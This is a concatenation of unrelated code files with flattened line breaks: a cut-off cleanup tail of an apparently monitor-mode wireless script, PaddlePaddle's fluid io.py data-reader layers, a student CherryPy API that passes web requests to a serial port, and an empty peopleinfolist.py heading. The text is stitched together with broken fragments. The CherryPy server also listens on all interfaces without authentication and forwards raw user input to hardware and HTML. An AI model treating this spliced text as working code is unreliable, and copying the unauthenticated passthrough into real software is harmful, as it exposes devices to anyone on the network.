remove_mon_iface(mon_iface) os.system('service network-manager restart') print '\n['+R+'!'+W+'] Closing' sys.exit(0)
io.py
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function from ..wrapped_decorator import signature_safe_contextmanager import multiprocessing import os import six import sys import threading from ..data_feeder import DataFeeder from .control_flow import BlockGuard from .layer_function_generator import templatedoc from .. import core from ..executor import global_scope from ..framework import convert_np_dtype_to_dtype_, default_main_program, \ default_startup_program, program_guard, Program, Variable from ..layer_helper import LayerHelper from ..unique_name import generate as unique_name import logging __all__ = [ 'data', 'read_file', 'double_buffer', 'py_reader', 'create_py_reader_by_data', 'load' ] def data(name, shape, append_batch_size=True, dtype='float32', lod_level=0, type=core.VarDesc.VarType.LOD_TENSOR, stop_gradient=True): """ **Data Layer** This operator creates the global variable. The global variables can be accessed by all the following operators in the graph. Note: :code:`paddle.fluid.layers.data` is deprecated as it will be removed in a later version. Please use :code:`paddle.fluid.data` . This :code:`paddle.fluid.layers.data` set shape and dtype at compile time but does NOT check the shape or the dtype of feeded data, the :code:`paddle.fluid.data` checks the shape and the dtype of data feeded by Executor or ParallelExecutor during run time. To feed variable size inputs, users can feed variable size inputs directly to this :code:`paddle.fluid.layers.data` and PaddlePaddle will fit the size accordingly. Or set -1 on the variable dimension when using :code:`paddle.fluid.data` . The default :code:`stop_gradient` attribute of the Variable created by this API is true, which means the gradient won't be passed backward through the data Varaible. Set :code:`var.stop_gradient = False` If user would like to pass backward gradient. Args: name(str): The name/alias of the variable, see :ref:`api_guide_Name` for more details. shape(list): Tuple declaring the shape. If :code:`append_batch_size` is True and there is no -1 inside :code:`shape`, it should be considered as the shape of the each sample. Otherwise, it should be considered as the shape of the batched data. append_batch_size(bool): 1. If true, it prepends -1 to the shape. For example if shape=[1], the resulting shape is [-1, 1]. This will be useful to set different batch size at run time. 2. If shape contains -1, such as shape=[1, -1]. append_batch_size will be enforced to be be False (ineffective) because PaddlePaddle cannot set more than 1 unknown number on the shape. dtype(np.dtype|VarType|str): The type of the data. Supported dtype: bool, float16, float32, float64, int8, int16, int32, int64, uint8. type(VarType): The output type. Supported dtype: VarType.LOD_TENSOR, VarType.SELECTED_ROWS, VarType.NCCL_ID. Default: VarType.LOD_TENSOR. lod_level(int): The LoD Level. 0 means the input data is not a sequence. Default: 0. 
stop_gradient(bool): A boolean that mentions whether gradient should flow. Default: True. Returns: The global variable that gives access to the data. Return Type: Variable Examples: .. code-block:: python import paddle.fluid as fluid data = fluid.layers.data(name='x', shape=[784], dtype='float32') """ helper = LayerHelper('data', **locals()) shape = list(shape) for i in six.moves.range(len(shape)): if shape[i] is None: shape[i] = -1 append_batch_size = False elif shape[i] < 0: append_batch_size = False if append_batch_size: shape = [-1] + shape # append batch size as -1 data_var = helper.create_global_variable( name=name, shape=shape, dtype=dtype, type=type, stop_gradient=stop_gradient, lod_level=lod_level, is_data=True) return data_var class BlockGuardServ(BlockGuard): """ BlockGuardServ class. BlockGuardServ class is used to create an op with a block in a program. """ def __init__(self, server): if not (isinstance(server, ListenAndServ)): raise TypeError("BlockGuardServ takes a ListenAndServ") super(BlockGuardServ, self).__init__(server.helper.main_program) self.server = server def __exit__(self, exc_type, exc_val, exc_tb): if exc_type is not None: return False self.server.complete_op() return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb) class ListenAndServ(object): """ **ListenAndServ Layer** ListenAndServ is used to create a rpc server bind and listen on specific TCP port, this server will run the sub-block when received variables from clients. Args: endpoint(string): IP:port string which the server will listen on. inputs(list): a list of variables that the server will get from clients. fan_in(int): how many client are expected to report to this server, default: 1. optimizer_mode(bool): whether to run the server as a parameter server, default: True. Examples: .. code-block:: python import paddle.fluid as fluid with fluid.program_guard(main): serv = layers.ListenAndServ( "127.0.0.1:6170", ["X"], optimizer_mode=False) with serv.do(): x = layers.data( shape=[32, 32], dtype='float32', name="X", append_batch_size=False) fluid.initializer.Constant(value=1.0)(x, main.global_block()) layers.scale(x=x, scale=10.0, out=out_var) exe = fluid.Executor(place) exe.run(main) """ def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True): self.helper = LayerHelper("listen_and_serv") self.inputs = inputs self.outputs = [] self.endpoint = endpoint self.fan_in = fan_in # FIXME(typhoonzero): add optimizer_mode is stupid, should make it more # general. self.optimizer_mode = optimizer_mode def do(self): return BlockGuardServ(self) def get_params_and_grads(self): main_program = self.helper.main_program current_block = main_program.current_block() parent_block = self.parent_block() # params and grads in the same order. params = list() grads = list() for op in current_block.ops: # FIXME(typhoonzero): op.inputs is None if it's cloned. if self.optimizer_mode: if "Grad" in op.inputs and "Param" in op.inputs: params.append(op.inputs["Param"].name) grads.append(op.inputs["Grad"].name) else: # simple recv mode, recv operators inputs. 
for iname in op.input_names: for in_var_name in op.input(iname): params.append(parent_block.var(in_var_name)) grads.append(parent_block.var(in_var_name)) return params, grads def parent_block(self): prog = self.helper.main_program parent_idx = prog.current_block().parent_idx assert parent_idx >= 0 parent_block = prog.block(parent_idx) return parent_block def complete_op(self): main_program = self.helper.main_program current_block = main_program.current_block() parent_block = self.parent_block() parent_block.append_op( type='listen_and_serv', inputs={"X": self.inputs}, outputs={}, attrs={ 'endpoint': self.endpoint, 'Fanin': self.fan_in, 'optimize_blocks': [ current_block ], # did not support multiple optimize blocks in layers 'sync_mode': True, # did not support async now in layers 'grad_to_block_id': [""] }) def Send(endpoints, send_vars, dummy_output=None, sync=True): """ Send variables to the server side, and get vars from server side when server have finished running server side program. Args: endpoints (str): comma seperated IP:PORT pairs in the order of send_vars to send send_vars (list): variables to send to server sync (bool): whether to wait the request finish """ assert (type(send_vars) == list) if dummy_output is None: dummy_output = [] elif isinstance(dummy_output, Variable): dummy_output = [dummy_output] assert (type(dummy_output) == list) epmap = endpoints.split(",") endpoints = list(set(epmap)) helper = LayerHelper("Send", **locals()) rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName() helper.append_op( type="send", inputs={"X": send_vars}, outputs={"Out": dummy_output}, attrs={ "endpoints": endpoints, "epmap": epmap, rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC }) if sync: helper.append_op( type="send_barrier", inputs={"X": dummy_output}, outputs={"Out": []}, attrs={"endpoints": endpoints}) def Recv(endpoints, get_vars, dummy_input=None, sync=True): """ Receive variables from server side Args: endpoints (str): comma seperated IP:PORT pairs in the order of send_vars to send get_vars (list): vars to get from server after send completes. 
sync (bool): whether to wait the request finish Returns: list: list of received variables """ assert (type(get_vars) == list) if dummy_input is None: dummy_input = [] elif isinstance(dummy_input, Variable): dummy_input = [dummy_input] assert (type(dummy_input) == list) epmap = endpoints.split(",") endpoints = list(set(epmap)) helper = LayerHelper("Recv", **locals()) helper.append_op( type="recv", inputs={"X": dummy_input}, outputs={"Out": get_vars}, attrs={"endpoints": endpoints, "epmap": epmap}) if sync: helper.append_op( type="fetch_barrier", outputs={"Out": get_vars}, attrs={"endpoints": endpoints}) return get_vars def monkey_patch_reader_methods(reader): def __get_reader__(): scope = global_scope() var = scope.find_var(reader.name) return var.get_reader() def reset(): return __get_reader__().reset() reader.reset = reset reader.stop_gradient = True reader.persistable = True return reader def _copy_reader_var_(block, var): new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER) new_var.desc.set_shapes(var.desc.shapes()) new_var.desc.set_dtypes(var.desc.dtypes()) new_var.desc.set_lod_levels(var.desc.lod_levels()) new_var.persistable = True return new_var def _copy_reader_create_op_(block, op): input_param_names = op.input_names new_input_map = {} for param_name in input_param_names: new_input_map[param_name] = [] arg_names = op.input(param_name) for arg_name in arg_names: new_input_map[param_name].append(block.var(arg_name)) output_param_names = op.output_names new_output_map = {} for param_name in output_param_names: new_output_map[param_name] = [] arg_names = op.output(param_name) for arg_name in arg_names: new_output_map[param_name].append(block.var(arg_name)) new_op = block.append_op( type=op.type, inputs=new_input_map, outputs=new_output_map, attrs=op.all_attrs()) return new_op def _py_reader(capacity, shapes, dtypes, lod_levels=None, name=None, use_double_buffer=True, feed_list=None): if feed_list is not None: if not isinstance(feed_list, list): raise TypeError("feed_list should be a list of Variable" " instead of " + str(type(feed_list))) lod_levels = [] dtypes = [] shape_concat = [] ranks = [] shapes = [] need_check_feed = [] for feed_data in feed_list: dtypes.append(feed_data.dtype) shape_concat.extend(feed_data.shape) ranks.append(len(feed_data.shape)) shapes.append(feed_data.shape) lod_levels.append(feed_data.lod_level) need_check_feed.append(int(feed_data.desc.need_check_feed())) else: dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes] need_check_feed = [0 for dt in dtypes] shape_concat = [] ranks = [] for shape in shapes: shape_concat.extend(shape) ranks.append(len(shape)) if lod_levels is None: lod_levels = [0] * len(shapes) dtype_int = [int(t) for t in dtypes] if name is None: queue_name = unique_name('lod_tensor_blocking_queue') reader_name = unique_name('create_py_reader') double_buffer_name = unique_name('double_buffer') else: queue_name = "_".join([name, "queue"]) reader_name = "_".join([name, "reader"]) double_buffer_name = "_".join([name, "double_buffer"]) var = global_scope().var(queue_name) feed_queue = core.init_lod_tensor_blocking_queue(var, capacity) startup_blk = default_startup_program().current_block() startup_var = startup_blk.create_var(name=reader_name) startup_blk.append_op( type='create_py_reader', inputs={'blocking_queue': [queue_name]}, outputs={'Out': [startup_var]}, attrs={ 'shape_concat': shape_concat, 'lod_levels': lod_levels, 'dtypes': dtype_int, 'need_check_feed': need_check_feed, 'ranks': ranks }) 
startup_var.desc.set_dtypes(dtypes) startup_var.persistable = True main_prog_var = _copy_reader_var_(default_main_program().current_block(), startup_var) reader = monkey_patch_reader_methods(main_prog_var) if use_double_buffer: double_buffer_reader = double_buffer(reader, name=double_buffer_name) # we return a double buffer reader. However, the reset method comes from # py_reader. double_buffer_reader.reset = reader.reset reader = double_buffer_reader # monkey patch py_reader special methods reader.queue = feed_queue current_reset_method = reader.reset reader.thread = None reader.tensor_provider = None reader.exited = False def start_provide_thread(func): def __provider_thread__(): try: for tensors in func(): array = core.LoDTensorArray() for item in tensors: if not isinstance(item, core.LoDTensor): tmp = core.LoDTensor() tmp.set(item, core.CPUPlace()) item = tmp array.append(item) if reader.exited: break feed_queue.push(array) if reader.exited: break feed_queue.close() except Exception as ex: feed_queue.kill() logging.warn('Your decorated reader has raised an exception!') six.reraise(*sys.exc_info()) reader.thread = threading.Thread(target=__provider_thread__) reader.thread.daemon = True reader.thread.start() def __set_tensor_provider__(func): reader.tensor_provider = func def __set_paddle_reader__(paddle_reader): with program_guard(Program(), Program()): actual_feed_list = feed_list if actual_feed_list is None: actual_feed_list = [] counter = 0 for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels): name = str(counter) actual_feed_list.append( data( name=name, dtype=dtype, shape=shape, lod_level=lod_level)) counter += 1 data_names = [feed_data.name for feed_data in actual_feed_list] feeder = DataFeeder( feed_list=actual_feed_list, place=core.CPUPlace()) paddle_reader = feeder.decorate_reader( paddle_reader, multi_devices=False) def __tensor_provider__(): for slots in paddle_reader(): yield [slots[data_name] for data_name in data_names] __set_tensor_provider__(__tensor_provider__) def __reset__(): current_reset_method() if reader.thread is not None and reader.tensor_provider is not None: reader.exited = True reader.thread.join() reader.exited = False def __start__(): start_provide_thread(reader.tensor_provider) reader.reset = __reset__ reader.decorate_tensor_provider = __set_tensor_provider__ reader.decorate_paddle_reader = __set_paddle_reader__ reader.decorate_batch_generator = __set_tensor_provider__ reader.decorate_sample_list_generator = __set_paddle_reader__ reader.start = __start__ return reader def py_reader(capacity, shapes, dtypes, lod_levels=None, name=None, use_double_buffer=True): """ Create a Python reader for data feeding in Python This operator returns a Reader Variable. The Reader provides :code:`decorate_paddle_reader()` and :code:`decorate_tensor_provider()` to set a Python generator as the data source and feed the data from the data source to the Reader Variable. When :code:`Executor::Run()` is invoked in C++ side, the data from the generator would be read automatically. Unlike :code:`DataFeeder.feed()`, the data reading process and :code:`Executor::Run()` process can run in parallel using :code:`py_reader`. The :code:`start()` method of the Reader should be called when each pass begins, while the :code:`reset()` method should be called when the pass ends and :code:`fluid.core.EOFException` raises. Note: :code:`Program.clone()` method cannot clone :code:`py_reader`. You can refer to :ref:`api_fluid_Program` for more details. 
The :code:`read_file` call needs to be in the program block of :code:`py_reader`. You can refer to :ref:`api_fluid_layers_read_file` for more details. Args: capacity(int): The buffer capacity maintained by :code:`py_reader`. shapes(list|tuple): List of tuples which declaring data shapes. shapes[i] represents the i-th data shape. dtypes(list|tuple): List of strings which declaring data type. Supported dtype: bool, float16, float32, float64, int8, int16, int32, int64, uint8. lod_levels(list|tuple): List of ints which declaring data lod_level. name(basestring): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. use_double_buffer(bool): Whether use double buffer or not. The double buffer is for pre-reading the data of the next batch and copy the data asynchronously from CPU to GPU. Default is True. Returns: A Reader from which we can get feeding data. Return Type: Variable Examples: 1. The basic usage of :code:`py_reader` is as follows: .. code-block:: python import paddle import paddle.fluid as fluid import paddle.dataset.mnist as mnist def network(image, label): # user defined network, here a softmax regresssion example predict = fluid.layers.fc(input=image, size=10, act='softmax') return fluid.layers.cross_entropy(input=predict, label=label) reader = fluid.layers.py_reader(capacity=64, shapes=[(-1, 1, 28, 28), (-1, 1)], dtypes=['float32', 'int64']) reader.decorate_paddle_reader( paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5), buf_size=1000)) img, label = fluid.layers.read_file(reader) loss = network(img, label) fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program()) exe = fluid.ParallelExecutor(use_cuda=True) for epoch_id in range(10): reader.start() try: while True: exe.run(fetch_list=[loss.name]) except fluid.core.EOFException: reader.reset() fluid.io.save_inference_model(dirname='./model', feeded_var_names=[img.name, label.name], target_vars=[loss], executor=fluid.Executor(fluid.CUDAPlace(0))) 2. When training and testing are both performed, two different :code:`py_reader` should be created with different names, e.g.: .. code-block:: python import paddle import paddle.fluid as fluid import paddle.dataset.mnist as mnist def network(reader): img, label = fluid.layers.read_file(reader) # User defined network. 
Here a simple regression as example predict = fluid.layers.fc(input=img, size=10, act='softmax') loss = fluid.layers.cross_entropy(input=predict, label=label) return fluid.layers.mean(loss) # Create train_main_prog and train_startup_prog train_main_prog = fluid.Program() train_startup_prog = fluid.Program() with fluid.program_guard(train_main_prog, train_startup_prog): # Use fluid.unique_name.guard() to share parameters with test program with fluid.unique_name.guard(): train_reader = fluid.layers.py_reader(capacity=64, shapes=[(-1, 1, 28, 28), (-1, 1)], dtypes=['float32', 'int64'], name='train_reader') train_reader.decorate_paddle_reader( paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5), buf_size=500)) train_loss = network(train_reader) # some network definition adam = fluid.optimizer.Adam(learning_rate=0.01) adam.minimize(train_loss) # Create test_main_prog and test_startup_prog test_main_prog = fluid.Program() test_startup_prog = fluid.Program() with fluid.program_guard(test_main_prog, test_startup_prog): # Use fluid.unique_name.guard() to share parameters with train program with fluid.unique_name.guard(): test_reader = fluid.layers.py_reader(capacity=32, shapes=[(-1, 1, 28, 28), (-1, 1)], dtypes=['float32', 'int64'], name='test_reader') test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512)) test_loss = network(test_reader) fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog) fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog) train_exe = fluid.ParallelExecutor(use_cuda=True, loss_name=train_loss.name, main_program=train_main_prog) test_exe = fluid.ParallelExecutor(use_cuda=True, loss_name=test_loss.name, main_program=test_main_prog) for epoch_id in range(10): train_reader.start() try: while True: train_exe.run(fetch_list=[train_loss.name]) except fluid.core.EOFException: train_reader.reset() test_reader.start() try: while True: test_exe.run(fetch_list=[test_loss.name]) except fluid.core.EOFException: test_reader.reset() """ logging.warn( 'paddle.fluid.layers.py_reader() may be deprecated in the near future. ' 'Please use paddle.fluid.io.DataLoader.from_generator() instead.') return _py_reader( capacity=capacity, shapes=shapes, dtypes=dtypes, lod_levels=lod_levels, name=name, use_double_buffer=use_double_buffer) def create_py_reader_by_data(capacity, feed_list, name=None, use_double_buffer=True): """ The OP creates a Python reader for data feeding in Python, it is similar to :ref:`api_fluid_layers_py_reader` except that it can read data from the list of feed variables. Parameters: capacity (int): The buffer capacity maintained by :code:`py_reader`. Its unit is batch number. Set larger :attr:`capacity` if the reader is fast. feed_list (list(Variable)): The feed variables, are usually created by :code:`fluid.data()`. name (str, optional): Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default: None. use_double_buffer (bool, optional): Whether use double buffer. If it's True, the OP would prefetch next batch data asynchronously. Default: True. Returns: Reader: A Reader for data feeding. The data types of read data are the same as the data types of variables of :attr:`feed_list`. Examples: .. code-block:: python import paddle import paddle.fluid as fluid import paddle.dataset.mnist as mnist def network(img, label): # User defined network. 
Here a simple regression as example predict = fluid.layers.fc(input=img, size=10, act='softmax') loss = fluid.layers.cross_entropy(input=predict, label=label) return fluid.layers.mean(loss) MEMORY_OPT = False USE_CUDA = False image = fluid.data(name='image', shape=[None, 1, 28, 28], dtype='float32') label = fluid.data(name='label', shape=[None, 1], dtype='int64') reader = fluid.layers.create_py_reader_by_data(capacity=64, feed_list=[image, label]) reader.decorate_paddle_reader( paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5), buf_size=500)) img, label = fluid.layers.read_file(reader) loss = network(img, label) # The definition of custom network and the loss funtion place = fluid.CUDAPlace(0) if USE_CUDA else fluid.CPUPlace() exe = fluid.Executor(place) exe.run(fluid.default_startup_program()) build_strategy = fluid.BuildStrategy() build_strategy.memory_optimize = True if MEMORY_OPT else False exec_strategy = fluid.ExecutionStrategy() compiled_prog = fluid.compiler.CompiledProgram( fluid.default_main_program()).with_data_parallel( loss_name=loss.name, build_strategy=build_strategy, exec_strategy=exec_strategy) for epoch_id in range(2): reader.start() try: while True: exe.run(compiled_prog, fetch_list=[loss.name]) except fluid.core.EOFException: reader.reset() """ logging.warn( 'paddle.fluid.layers.create_py_reader_by_data() may be deprecated in the near future. ' 'Please use paddle.fluid.io.DataLoader.from_generator() instead.') return _py_reader( capacity=capacity, shapes=None, dtypes=None, lod_levels=None, name=name, use_double_buffer=use_double_buffer, feed_list=feed_list) def __create_shared_decorated_reader__(op_type, reader, attrs): var_name = unique_name(op_type) startup_blk = default_startup_program().current_block() startup_var = startup_blk.create_var(name=var_name) startop_op = startup_blk.append_op( type=op_type, inputs={'UnderlyingReader': reader}, outputs={'Out': [startup_var]}, attrs=attrs) startup_var.persistable = True main_prog_block = default_main_program().current_block() main_prog_var = _copy_reader_var_(main_prog_block, startup_var) _copy_reader_create_op_(main_prog_block, startop_op) return monkey_patch_reader_methods(main_prog_var) def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None): new_reader_name = name if name is not None else unique_name(op_type) main_blk = default_main_program().current_block() new_reader = main_blk.create_var(name=new_reader_name) main_blk.append_op( type=op_type, inputs={'UnderlyingReader': reader}, outputs={'Out': [new_reader]}, attrs=attrs) return monkey_patch_reader_methods(new_reader) def double_buffer(reader, place=None, name=None): """ Wrap a double buffer reader. The class Reader contains DecoratedReader and FileReader. Moreover, the DecoratedReader is inherited by CustomReader and BufferedReader. This function is related to BufferedReader. The data will copy to target place with a double buffer queue. If the target place is None, the place that executor perform on will be used. Args: reader (Variable): The Reader Variable need to be wrapped. place (Place, optional): The place of target data, such as CPU, GPU, and if use GPU, it's necessary to point out which card is involved. Default is the sample place of executor perform. name (str, optional): Variable name. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default is None. Returns: Variable(Reader): wrapped reader with double buffer. Examples: .. 
code-block:: python import paddle.fluid as fluid reader = fluid.layers.py_reader(capacity=64, shapes=[(-1, 1, 28, 28), (-1, 1)], dtypes=['float32', 'int64'], use_double_buffer=False) reader = fluid.layers.double_buffer(reader) image, label = fluid.layers.read_file(reader) """ attrs = dict() if place is not None: attrs['place'] = str(place).upper() return __create_unshared_decorated_reader__( 'create_double_buffer_reader', reader, attrs, name=name) def read_file(reader): """ Execute the given reader and get data via it. A reader is also a Variable. It can be a raw reader generated by `fluid.layers.open_files()` or a decorated one generated by `fluid.layers.double_buffer()` . Args: reader(Variable): The reader to execute. Returns: Tuple[Variable]: Data read from the given reader. Examples: .. code-block:: python import paddle.fluid as fluid reader = fluid.layers.py_reader(capacity=64, shapes=[(-1, 1, 28, 28), (-1, 1)], dtypes=['float32', 'int64']) image, label = fluid.layers.read_file(reader) """ helper = LayerHelper('read_file') out = [ helper.create_variable_for_type_inference( stop_gradient=True, dtype='float32') for _ in range(len(reader.desc.shapes())) ] helper.append_op( type='read', inputs={'Reader': [reader]}, outputs={'Out': out}) if len(out) == 1: return out[0] else: return out def load(out, file_path, load_as_fp16=None): """ Load operator will load a LoDTensor / SelectedRows variable from disk file. Args: out(Variable): The LoDTensor / SelectedRows need to be loaded.. file_path(STRING): Variable will be loaded from "file_path". load_as_fp16(BOOLEAN): If true, the tensor will be first loaded and then converted to float16 data type. Otherwise, the tensor will be directly loaded without data type conversion. Default is false.. Returns: None Examples: .. code-block:: python import paddle.fluid as fluid tmp_tensor = fluid.layers.create_tensor(dtype='float32') fluid.layers.load(tmp_tensor, "./tmp_tensor.bin") """ helper = LayerHelper("load", **locals()) attrs = {"file_path": file_path} if load_as_fp16 is not None: attrs['load_as_fp16'] = load_as_fp16 helper.append_op(type="load", inputs={}, output={"Out": out}, attrs=attrs)
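# --- Illustrative sketch (not part of the original module) ---
# The reader returned by py_reader() above is monkey patched with start(),
# reset() and decorate_tensor_provider(); the provider must be a generator
# function yielding one list of numpy arrays (or LoDTensors) per batch.
# A hedged example: shapes, batch size and iteration count are placeholders,
# and the helper name _example_py_reader_tensor_provider is not part of the
# fluid API.
def _example_py_reader_tensor_provider():
    import numpy as np
    import paddle.fluid as fluid

    reader = fluid.layers.py_reader(
        capacity=8, shapes=[(-1, 784), (-1, 1)], dtypes=['float32', 'int64'])

    def batches():
        for _ in range(100):
            img = np.random.random([32, 784]).astype('float32')
            lbl = np.random.randint(0, 10, size=[32, 1]).astype('int64')
            yield [img, lbl]

    reader.decorate_tensor_provider(batches)
    img, lbl = fluid.layers.read_file(reader)
    # Build a network on img/lbl, then for each pass call reader.start(),
    # run the executor until fluid.core.EOFException, and reader.reset().
    return img, lbl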
main.py
#NAME: main.py #DATE: Wednesday 5th August 2019 #AUTH: Ryan McCartney, EEE Undergraduate, Queen's University Belfast #DESC: A python script for running a cherrpi API as a serial passthrough #COPY: Copyright 2018, All Rights Reserved, Ryan McCartney import threading import cherrypy import serial import time import json import os cofigFilePath = "api/settings.json" #define threading wrapper def threaded(fn): def wrapper(*args, **kwargs): thread = threading.Thread(target=fn, args=args, kwargs=kwargs) thread.start() return thread return wrapper try: class API(object): def __init__(self,cofigFilePath): self.loadConfig(cofigFilePath) #Initiialise other Variables self.connected = False self.serialMonitorData = ["-,-"]*self.serialMonitorLines self.latestMessage = "" self.previousMessage = "" self.indexPrepared = False #Update Server Port cherrypy.config.update( {'server.socket_host': '0.0.0.0', 'server.socket_port': self.serverPort} ) #On startup try to connect to serial self.connect() self.startXboxControl() def loadConfig(self,configFilePath): with open(configFilePath) as configFile: config = json.load(configFile) self.serverName = config["serverName"] self.serverPort = config["serverPort"] self.serialPort = config["serialPort"] self.baudrate = config["baudrate"] self.serialMonitorLines = config["serialMonitorLines"] self.hostname = config["hostname"] @cherrypy.expose def index(self): if not self.indexPrepared: self.prepareIndex() #On index try to connect to serial self.connect() with open ("api/index.html", "r") as webPage: contents=webPage.readlines() return contents def prepareIndex(self): contents = "" with open("api/baseIndex.html", "rt") as webPageIn: for line in webPageIn: contents += line.replace('SERVERNAMEFEILD',self.serverName) with open("api/index.html", "wt") as webPageOut: webPageOut.write(contents) self.indexPrepared = True @cherrypy.expose def startXboxControl(self): try: status = "Xbox Controller succesfully connected." except: status = "Xbox Controller coulf not be connected." return status @cherrypy.expose def joystick(self): self.disconnect() self.connect() with open ("api/joystick.html", "r") as webPage: contents=webPage.readlines() return contents @cherrypy.expose def clearLogs(self): currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") #Clear Transmit Log log = open("api/public/transmitLog.csv","w") log.write("Date and Time,Command String Passed\n") log.close() #Clear Receive Log log = open("api/public/receiveLog.csv","w") log.write("Date and Time,"+self.serverName+" Response\n") log.close() #Clear serial monitor self.serialMonitorData = ["-,-"]*self.serialMonitorLines #Return Message status = currentDateTime + " - INFO: Transmit and Receive Logs have been cleared." print(status) return status @cherrypy.expose def send(self,command="this"): #Get Current Date and Time for Logging currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") if(self.connected == False): status = self.connect() try: #Add command to transmit log with open ("api/public/transmitLog.csv", "a+") as log: log.write(currentDateTime+","+command+"\n") #Write Command Passed to Serial Port payload = (command+'\n').encode('ascii') self.serial.write(payload) time.sleep(0.008) status = currentDateTime + " - INFO: '" + command + "' sent succesfully." except: status = currentDateTime + " - ERROR: Could not send '"+ command +"' to serial port. Check connection." 
self.connected = False print(status) return status @threaded def receive(self): #Initialise array to store data serial monitor data self.serialMonitorData = ["-,-"]*self.serialMonitorLines while self.connected == True: #Get Current Date and Time for Logging currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") #Read Response if Avalible response = "VOID" try: if self.serial.in_waiting > 0: response = self.serial.readline().decode('utf-8') response = response.strip() logLine = currentDateTime+","+str(response) self.latestMessage = response #Add response to receive log with open ("api/public/receiveLog.csv", "a+") as log: log.write(logLine+"\n") #Add received data to serial monitor array self.serialMonitorData.pop(0) self.serialMonitorData.append(logLine) #print(logLine) if self.serial.in_waiting > 200: self.serial.reset_input_buffer() dump = self.serial.readline().decode('utf-8') currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") status = currentDateTime + " - ERROR: Buffer full dumping '"+str(dump)+"'." print(status) except: self.connected = False currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") status = currentDateTime + " - ERROR: Cannot read serial line." print(status) @cherrypy.expose def serialMonitor(self): headers = ["Timestamp","Data 1","Data 2","Data 3","Data 4"] #Add Correct number of Headers table = "<table><tr>" for header in headers: table += "<th>"+header+"</th>" table += "</tr>" #Get table contents rows = len(self.serialMonitorData)-1 for i in range(rows,0,-1): row = self.serialMonitorData[i] table += "<tr><td width='20%'>" table += row.replace(",", "</td><td width='15%'>",len(headers)) if row.count(',') < len(headers): for i in range(row.count(','),len(headers)-1): table += "</td><td width='15%'>" table += "</td></tr>" table +="</table>" return table @cherrypy.expose def getLast(self): return self.latestMessage @cherrypy.expose def getLatest(self): if self.previousMessage == self.latestMessage: message = "" else: message = self.latestMessage self.previousMessage = self.latestMessage return message @cherrypy.expose def connect(self): currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") status = currentDateTime + " - INFO: Motor control box arduino already connected." if(self.connected == False): try: self.disconnect() #Open Serial Connection self.serial = serial.Serial( port= self.serialPort, baudrate=self.baudrate, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, ) time.sleep(1) self.connected = True self.receive() status = "INFO: "+self.serverName+" connected to "+self.serial.name+"." except: status = "ERROR: Could not establish a connection with "+self.serverName+"." print(status) return status @cherrypy.expose def disconnect(self): try: self.serial.close() self.connected = False status = "INFO: "+self.serverName+" disconnected." except: status = "INFO: "+self.serverName+" is not connected." print(status) return status @cherrypy.expose def getImage(self): image = "NOT YET OPERATIONAL" return image if __name__ == '__main__': cherrypy.config.update( {'server.socket_host': '0.0.0.0', 'server.socket_port': 8080} ) cherrypy.quickstart(API(cofigFilePath), '/', { 'favicon.ico': { 'tools.staticfile.on': True, 'tools.staticfile.filename': os.path.join(os.getcwd(),'api/public/favicon.ico') }, '/public': { 'tools.staticdir.on' : True, 'tools.staticdir.dir' : os.path.join(os.getcwd(),'api/public'), 'tools.staticdir.index' : 'index.html', 'tools.gzip.on' : True } } ) except: print("ERROR: Main sequence error.")
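# --- Illustrative client sketch (a separate script, not part of main.py) ---
# The exposed cherrypy handlers above map directly to URL paths, with keyword
# arguments passed as query parameters. A minimal, hedged client assuming the
# server is reachable on localhost:8080 (the port set in __main__); the
# command string "status" is just a placeholder.
import requests

BASE_URL = "http://localhost:8080"

def send_command(command):
    # Calls API.send(command=...) defined above.
    return requests.get(BASE_URL + "/send", params={"command": command}).text

def latest_response():
    # Calls API.getLatest(); returns an empty string when nothing new arrived.
    return requests.get(BASE_URL + "/getLatest").text

if __name__ == "__main__":
    print(send_command("status"))
    print(latest_response())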
peopleinfolist.py
